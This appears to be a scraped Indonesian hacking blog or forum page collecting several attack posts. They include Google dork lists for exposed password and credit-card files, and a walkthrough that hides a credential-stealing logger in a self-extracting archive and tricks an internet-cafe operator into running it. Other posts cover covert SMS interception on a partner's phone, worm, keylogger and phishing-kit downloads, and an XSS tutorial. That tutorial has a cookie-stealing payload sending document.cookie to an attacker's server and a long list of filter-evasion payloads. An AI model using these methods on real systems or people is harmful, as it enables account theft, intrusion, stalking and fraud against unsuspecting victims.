"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"
"Index of /admin.asp"
"Index of /login.asp"Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :
inurl: /cgi-bin/cart32.exe
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe
llinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
allinurl:/privmsg.php
allinurl:/privmsg.php
inurl:cgi-bin/go.cgi?go=*
allinurl:.cgi?page=*.txt
allinurul:/modules/My_eGalleryPenggunaan lain dari sintaks “intitle:” atau “allintitle:” yang dikombinasikan dengan sintaks lainnya antara lain :
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
ntitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
allintitle:*.php?filename=*
allintitle:*.php?page=*
allintitle:*.php?logon=*Dibawah ini ada beberapa contoh kasus:
(silahkan mencoba...segala resiko berkenaan dengan security website yang dituju...merupakan tanggung jawab masing-masing)Operator dasar
+, -, ~ , ., *, “”, |, OR
Operator tambahan
allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange
Extensi yang dapat dicari:
HyperText Markup Language (html)
Microsoft PowerPoint (ppt)
Adobe Portable Document Format (pdf)
Microsoft Word (doc)
Adobe PostScript (ps)
Microsoft Works (wks, wps, wdb)
Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
Microsoft Excel (xls)
Microsoft Write (wri)
Lotus WordPro (lwp)
Rich Text Format (rtf)
MacWrite (mw)
Shockwave Flash (swf)
Text (ans, txt)Pencarian berdasarkan range
komputer Rp5000000..7000000Pencarian gaji
Salary filetype: xls site: edu
Salary filetype: xls site: eduInformasi financial
Filetype: xls “checking account” “credit card” -intext: Application -intext: Form
Intitle: “Index of” finances.xlsMencari inbox e-mail
Intitle: Index.of inurl: Inbox (456) (mit mailbox)
Intitle: Index.of inurl: Inbox (inurl: User OR inurl: Mail) (220)Mendeteksi OS
"Microsoft-IIS/5.0 server at”
Intitle: “Welcome to Windows 2000 Internet Services” IIS 5.0
Intitle: Test.Page.for.Apache seeing.this.instead
Intitle: Test.page “SSL/TLS-aware”Mencari password
Inurl: etc inurl: passwd
Intitle: “Index of..etc” passwd
"# -FrontPage-" inurl: service.pwd
Inurl: admin.pwd filetype: pwd
Filetype: inc dbconn
Filetype: inc intext: mysql_connect
Filetype: ini +ws_ftp +pwd
Filetype: log inurl: “password.log”Mencari User Name
+intext: "webalizer" +intext: “Total Usernames” +intext: “Usage Statistics for”Mencari License Key
Filetype: lic lic intext: keySensitve Directories Listing
Intitle: “Index of” cfide
Intitle: index.of.winnt
Intitle: “index of” iissamplesPosted 4 months ago # -
HACK WAKTU BILLING CyberBilling All Version [hack warnet]
ini adalah trik untuk menghentikan billing yang biasa ada diwarnet.
bisa dilambatin sma bisa diberhentiin .
pakai Cheat Engine v5.3download disini .
untuk tutorialnya .
cyberbilling-ray16 Url:
http://www.indowebster.com/cyberbillingray16.htmlDiupload tgl: 20/02/08 Size: 186.82MB
Vurln nya di sinkronisasi waktu server sma client,
coz
Client > Server
kalo klien waktunya berhenti / lambat di server pun juga gitu .cara, tapi jng ketahuan servernya ya ??
1. SETELAH PAKAI CHEAT ENGINE DAN WAKTU BERHENTI / LAMBAT
2. SETELAH PUAS MAIN
3. RESTARTTTT!! DENGAN TOMBOL PANIC.coba aja !!
cheat engine bisa didownload lewatb sini :
http://www.heijnen1.demon.nl/setelah itu cari cheat engine v5.3 .
dan selamat mencoba .
Posted 4 months ago # -
NGE-HACK FRIENDSTER
jaman mulai hebat datangnya org" yg pandai nge-hack .
ternyata nge-hack friendster itu mudah banget g kaya' yg gw kira yg harus pandai programming .
coba download link dibawah ini .
coz terlalu besar untuk di posting .
bwt kamo" yg sering iseng otak - atik friendster .dari pertama yang di ajarkan teman" hacker saya jd penasaran dan ingin bertanya" .
akhirnya bisa jg bwt nge-hack fs .neE link'nya bwt download .
http://www.4shared.com/file/93550786/c385a4b8/hack_friendster_-_dhendhie.htmlPosted 4 months ago # -
CARA MEMBUAT VIRUS WORM DENGAN MUDAH
Hy, teman?? Kamu pasti inget dengan virus worm yang sempat menghebohkan Tampilan awal program Vbs WGinternet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.
Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.
Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.
Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.
aplikasi tersebut dapat di download lewat link ini dalam bentuk .zip :
http://www.4shared.com/file/58988982/d138203b/Vbswg2BFix.html?s=1Posted 4 months ago # -
Cara Mendapatkan Password Operator dan Admin IndoBilling
IndoBilling merupakan software Billing untuk warnet, game online maupun offline, persewaan komputer, kursus, rental pengetikan, laboratorium sekolahan, dll. ---> hasil Googling :D
Nah, kali ini saya dapat artikel dari http://spyrozone.net/ yang akan memandu Anda untuk mendapatkan password Admin dan Operator indoBilling.
Aha.. gini aja dech skenarionya, biar Anda nggak terlalu dosa dan nggak masuk kategori terlalu jahat v['_']-:
Anda Ngenet di sebuah warnet yang super mahal. Nah, begitu tombol STOP pada billing Anda klik, Anda baru ingat bahwa ada file penting yang belum Anda salin. Mau login lagi.. tentunya ntar kena biaya tambahan dunk karena billing udah berjalan, apalagi jika file yang disalin agak banyak sehingga agak menyita waktu. Nah, jika Anda punya account Operator atau account Admin, Anda bisa login tanpa harus terkena biaya.
Skenario lainnya... silahkan dimanfaatkan sesuai kebutuhan aja dech :D
Langkah 1
Download aplikasi indoLogger v1.0 di sini. Aplikasi mungil dengan ukuran 7 KB tersebut saya rancang (healah, pake bahasa "rancang" segala ^^) untuk membantu Anda mencuri Log IndoBilling. Jika sudah, kini kita akan melakukan sedikit social engineering ^_*
Langkah 2
Pastikan di komputer Anda sudah terinstall WinRAR (www.rarlab.com). Siapkan beberapa file dokumen sebagai bahan untuk menyamarkan indoLogger. Klik kanan pada kumpulan file yang akan di pack, pilih menu "Winrar" lalu pilih "Add to Archive..."
Langkah 3
Jendela dialog WinRAR akan terbuka. Beri nama Lampiran.exe atau terserah Anda. Jangan lupa centang "Create SFX archive"Langkah 4
Selanjutnya klik tab [Advanced] kemudian klik tombol [Sfx Options...]. Klik opsi "Create in the current folder" pada tab [General]. Isikan "indologger.exe" pada isian "Run after extraction". Perhatikan gambar berikut:Dengan setting diatas, indologger.exe otomatis dieksekusi secara background setelah proses extract. Indologger sendiri akan terminate secara otomatis setelah menjalankan tugasnya mencuri log billing.
Langkah 5
Klik tab [Modes] kemudian pilih opsi "Hide All" dan "Overwrite all files". Klik [OK] untuk menyimpan konfigurasi, lalu klik [OK] untuk melakukan packing.Langkah 6
Kini, salin file Lampiran.exe hasil winrar tadi kedlam Flashdisk Anda. Setelah itu, ubah VOLUME LABEL Flashdisk Anda menjadi SPYROZONEINGAT!! Nama Volume Label Flashdisk Anda HARUS SPYROZONE
Langkah 7
Datangi si Operator. Lakukan Social Engineering. Misalnya saja Anda pura-pura maw print sesuatu, atau bisa juga dengan kata-kata seperti ini:Anda : Mas, saya mau ambil data nich, tapi disana Flashdisk saya nggak detect.
Operator menancapkan Flashdisk Anda
Operator : Yang mana filenya de'?
Anda : Yang ini mas, Lampiran. Coba di lihat dulu isinya mas.
Operator mengklik ganda Lampiran.exe hasil winrar. File-file dokumen didalamnya akan diextract seperti ketika kita melakukan extract file rar biasa, indologger.exe akan otomatis diexecute secara background.
Nah, setelah itu sampaikan terima kasih kepada Operator, pergilah ke komputer Client :D
Di Flashdisk Anda akan terdapat file baru dengan nama "spyrozone.net". File tersebut berisi log IndoBilling hasil curian. Bukalah file tersebut menggunakan NOTEPAD. Silahkan Anda cari password Admin dan Operatornya pada file tersebut. Berikut contoh isi file spyrozone.net hasil Social engineering saya di sebuah warnet di Surabaya :D
Pada gambar diatas terlihat bahwa terdapat operator dengan username "riska" dan password "eM95111".
Posted 4 months ago # -
Cara Mudah Membuat Keylogger Sendiri dan Antinya.
Keylogger merupakan sebuah alat atau software yang mampu merekam aktifitas penekanan tombol pada keyboard. Sebagai “ancaman klasik” akan keamanan, sampai saat ini tidak ada metode yang benar-benar ampuh menghapus 100% ancaman akan keylogger.Keylogger juga merupakan tools yang pada dasarnya memiliki sebuah fungsi untuk melakukan monitoring semua akitivitas yang dilakukan oleh user pada sebuah PC. Mulai dari merekam password yang diketikan, chatting di instant messaging, program apa saja yang dijalankan oleh user, apa yang dilakukan user pada program tersebut, dan semua yang diketikkan di keyboard hingga pergerakan mouse, bahkan beberapa keylogger yang telah lama beredar mengincludekan fasilitas pengcapture layar monitor setiap 5 menit sekali, dan outputnya adalah HTML.
Seiring dengan semakin berkembangnya pemanfaatan Teknologi Informasi yang ditandai dengan revolusi komunikasi menggunakan media internet, berbagai kemudahan dalam melaksanakan aktifitas sehari-hari juga semakin meningkat. Jika dahulu ketika kita ingin berbelanja suatu barang kita harus datang langsung ke tokonya, maka kini dengan menggunakan internet kita dapat berbelanja dari rumah atau kantor dan kemudian tinggal menunggu barang yang kita pesan tiba di rumah. Aktifitas seperti ini yang sering disebut dengan e-commerce, disamping memudahkan proses jual-beli, juga membawa potensi untuk disalahgunakan.
Sering kita dengar di berita-berita tentang pencurian nomor kartu kredit, password e-mail, dan sebagainya. Salah satu metode yang sering digunakan untuk memperoleh data-data pribadi seperti itu adalah dengan menggunakan keylogger. Keylogger merupakan sebuah alat atau sebuah perangkat lunak yang dapat digunakan untuk merekam aktifitas penekanan tombol pada keyboard sehingga pengguna yang tidak tahu apa-apa, secara lengah memasukkan data pribadi seperti password melalui sebuah komputer yang telah dipasangi keylogger oleh pihak yang tidak bertanggungjawab.
Tulisan ini membahas tentang cara kerja dan pembuatan keylogger software serta antinya pada sistem operasi Windows. Perlu diingat bahwa segala istilah keylogger yang penulis gunakan di sini mengacu kepada keylogger software.
untuk selanjutnya silahkan anda download di link bawah ini.
Membuat Keylogger dan Antinya pada Sistem Operasi Windows http://ilmukomputer.org/wp-content/uploads/2007/05/khaidir-keylogger.zip
Posted 4 months ago # -
Cara mudah menyadap SMS dari ponsel anda
ini adalah trik untuk menyadap ponsel, bisa anda gunakan sebagai mata-mata untuk pacar biar tidak selingkuh.
hehehehehehe .oke langsung saja.
syarat:
# HP adalah HP symbian. Baik HP anda maupun HP teman anda.
# Merek NOKIA
# Memiliki aplikasi simbyan smsanywherelite.sishp korban juga harus sama yah punya aplikasi simbyan smsanywherelite.sis
Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :
1. download smsanywherelite.sis untuk software menyadap.
direct link :
http://7c3e65c9.linkbucks.com/?lurl=http%3A%2F%2Fwww.wireless-labs.com%2Fdownload%2FSmsAnywhere_S60_2_0_v_1_4_1.SISkalau tidak bisa disitu, silahkan download di :
http://www.ziddu.com/download/3233238/smsanywherelite_s60_2_0_v_1_1_0.sis.zip.html2. Masukkan aplikasi symbian itu di HP anda dan korban
3. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).
4. Siapkan hp/ponsel korban anda
5. Siapkan HP anda yang akan menerima sms masuk dari korban anda.
6. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.
7. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0
8. Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya 36
selamat mencoba . . .
Posted 4 months ago # -
PostDikirim: Min Ags 02, 2009 9:04 pm Judul: Rapidshare Cracking Kit Balas dengan kutipan
Rapidshare Cracking Kit | 5MB | RS | ES
Include:
- Premium Rapidshare cracking software
- Premium Rapidshare Account Checking Software
- Premium Rapidshare Account Checking PHP SCRIPT
- Proxy Checkers (Working and Clean)
- Proxy Leechers (Working and Clean)
- Username Wordlists - Real Names
- Password Wordlists - Real Names
- BONUS Wordlists - 35 GB +
- Word List Managers (Working & Clean)
- Working Guide
- Bonus 30+ site Phisers and A Phisher Maker.Download:
Code:
http://rapidshare.com/files/239660027/Rshare_Cracking_Kit_www.indogear.com.rarMirror:
Code:
http://www.easy-share.com/1905487969/Rshare_Cracking_Kit_www.indogear.com.rarPosted 4 months ago # -
Tip mengamankan komputer dari serangan virus
# Selalu update program antivirus (virus definition dan engine) agar terhindar dari virus-virus baru. Jika memungkinkan update setiap minggu atau paling tidak setiap bulan.
# Jangan menginstall lebih dari satu antivirus dalam suatu sistem, karena akan memperlambat sistem tersebut.
# Banyak virus yang icon-nya mirip file biasa (misalnya mirip Microsoft Word atau JPG), padahal file tersebut adalah virus dan memiliki ekstensi EXE (executable). Untuk menghindari hal seperti ini, buka Windows Explorer, Tool -> Folder Option -> View. Check pada pilihan Show Hidden Files and Folder, uncheck pada pilihan Hide Extension for Known Type Files, uncheck pada pilihan Hide Protected Operating System Files.Info2 antivirus: http://www.computerantivirus.tk
Posted 4 months ago # -
XSS INJECTION
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan
dijalankan melalui browser di client. Xss mungkin jenis serangan yang paling
cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan Xss hanya membutuhkan sebuah browser saja.
Bagaimanakah menemukan Situs yang vulner?
Mmpph......mencari situs yang vulner emang gampang-gampang susah, karena kebanyakan situs udah memfilternya, tapi gimanapun kita masih bisa menyuruh kacung paling baik di seluruh dunia untuk mencarinya, sapa lagi kalo bukan si mbah Google.
Sep sekarang kita cari kira” apa ya yang sebuah column terus memberikan feetback ma usernya Guest book, Search Box, Shoutboxes, Comment atau forum. Kita coba pakek
Search inurl:"search.php?q="Nah Kalau dah dapat..webnya kita masukan script pada search box atau apa aja yang memberikan feedback sekarang saya memasukan skriptnya lewat search box..
Code: Select all
<script>alert("XSS")</script>maka jika menampilkan dialog box seperti ini maka site itu vulner
tapi apakah sekedar itu saja, sekarang kita coba dengan metoda lain, apakah site itu bisa dideface bro? bisa saja, sekarang kita coba bagaimana mengattack site yang vulner itu ok.
dengan penyisipan tag IMG SCR pada sebuah url atau pada comment sekali.
Apa itu IMG SCR tu bro? IMG SCR itu adalah semacam Tag pemangilan gambar dari suatu link tertentu untuk ditampilkan kepada website tersebut.
pemanggilan tag itu dengan code sebagai berikut :
Code: Select all
<html><body><IMG SRC="http://www.indoimage.com/image-520B_49E166CF.jpg"></body></html>tapi terlebih dahulu gambar deface lo bisa upload dulu ke hostingan, misalnya ke photobucket atau flickr. setelah itu ganti url nya dengan url gambar tadi.
hingga menjadi seperti seperti berikut :
Code: Select all
<html><body><IMG SRC="http://Photobucket/Gambar_deface_gw.Jpeg"></body></html>nah setelah siap kemudian sisipkan pada URl situs yang mempunyai bug tadi hingga menjadi seperti contoh.
Code: Select all
http://www.Target.ac.id/search/?q=<html><body><IMG SRC="http://Photobucket/Gambar_deface_gw.Jpeg"></body></html>, kemudian apa yang terjadi???
maka situs yang mempunyai bug tadi akan berubah tampilan menjadi gambar yang kita upload tadi.
misalnya contoh gini:metode penyisipan lain selain dengan gambar juga bisa kita lakukan misalnya dengan file flash (SWF) hingga serangan ini mempunyai style tersendiri
Code: Select all
<EMBED SRC="http://site.com/xss.swfdengan penyisipan tag tersebut maka akan langsung meng exekusi file SWF pada link tersebut.
atau mungkin dengan melakukan redirect ke situs lain misalnya dengan code :
Code: Select all
<script>window.open( "http://www.google.com/" )</script>maka jika dieksekusi , kita akan di redirect ke situs google, mungkin biasa aja, tapi gimana klo dibawa ke suatu situs login palsu misalnya fake login yahoo, mungkin bisa berbahaya juga tuh.
Nah oleh karena itu XSS ini walaupun bug kecil tapi bisa berbahaya juga, misalnya dengan melakukan teknik Xss Cookies Stealing.
Apa itu Cookies Stealing . cookie stealing itu adalah mendapatkan cookie orang lain, supaya kamu dikenali oleh Situs target sebagai orang tersebut.
Nah buat pertamanya ambil Cookie Logger Di http://G0t-Root.net/tools/cookie.php
Ok sekarang gw anggap lo dah memilikinya save dengan extensien Php dan upload ke server lo, dan jangan lupa untuk membuat file LOG.TXT dengan chmod 777 dan sekarang kita langsung menuju ke website yang akan diserang.
masukan code ini
Code: Select all
window.location = "http://server lo.com/cookielogger.php?c="+document.cookieatau
Code: Select all
document.location = "http://Server lo.com/cookielogger.php?c="+document.cookiehingga otomatis url pada site berubah menjadi
Code: Select all
http://Target.com/search.php?q=document.location = "http://server lo.com/cookielogger.php?c="+document.cookieNah jika ada user berkunjung ke situs yang telah di inject tadi maka otomatis cookies tersebut akan terekam dan masuk kedalam log file yang telah dipersiapkan dan lo bisa mengawasi cookies yang didapatkan hingga ntar lo bisa meng hijack cookies tersebut.
NIH Bonus Script yang biasa diinjectkan
XSS (Cross Site Scripting):
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]'';!--"<XSS>=&{()}
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]<IMG SRC="javascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]No quotes and no semicolon:
<IMG SRC=javascript:alert('XSS')>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]Case insensitive XSS attack vector:
<IMG SRC=JaVaScRiPt:alert('XSS')>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]HTML entities (the semicolons are required for this to work):
<IMG SRC=javascript:alert("XSS")>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]<IMG SRC=
javascript:alert("RSnake says, 'XSS'")>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]<IMG SRC=javascript:alert('XSS')>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]<IMG SRC=javascript:alert('XSS')>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]Embedded tab to break up the cross site scripting attack: <IMG SRC="jav ascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]Embedded encoded tab to break up XSS:
<IMG SRC="jav ascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]<SCRIPT SRC=//ha.ckers.org/.j>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]<IMG tag:
<IMG SRC="javascript:alert('XSS')"
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]<iframe src=http://ha.ckers.org/scriptlet.html <
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]XSS with no single quotes or double quotes or semicolons:
<SCRIPT>alert(/XSS/.source)</SCRIPT>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
\";alert('XSS');//
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]End title tag. This is a simple XSS vector that closes <TITLE> tags, which can encapsulate the malicious cross site scripting attack:
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]INPUT image:
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]BODY image:
<BODY BACKGROUND="javascript:alert('XSS')">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign ("onload=" != "onload ="):
<BODY ONLOAD=alert('XSS')>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]IMG Dynsrc:
<IMG DYNSRC="javascript:alert('XSS')">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]IMG lowsrc:
<IMG LOWSRC="javascript:alert('XSS')">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]BGSOUND:
<BGSOUND SRC="javascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]& JavaScript includes (works in Netscape 4.x):
<BR SIZE="&{alert('XSS')}">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]LAYER (also only works in Netscape 4.x)
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]STYLE sheet:
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE> tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]Remote style sheet part 3. This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites:
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]Local htc file. This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:
<XSS STYLE="behavior: url(xss.htc);">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]List-style-image. Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE>- XSS
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]VBscript in an image:
<IMG SRC='vbscript:msgbox("XSS")'>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]Mocha (older versions of Netscape only):
<IMG SRC="mocha:[code]">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]Livescript (older versions of Netscape only):
<IMG SRC="livescript:[code]">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]US-ASCII encoding (found by Kurt Huwig). This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. I highly suggest anyone interested in alternate encoding issues look at my charsets issues page:
¼script¾alert(¢XSS¢)¼/script¾
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] [NS4]META (the odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs):
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]META using data: directive URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see RFC 2397 for more details or go here or here to encode your own. You can also use the XSS calculator below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method:
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]META with additional URL parameter. If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by Moritz Naumann):
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]IFRAME (if iframes are allowed there are a lot of other XSS problems as well):
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]FRAME (frames have the same sorts of XSS problems as iframes):
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
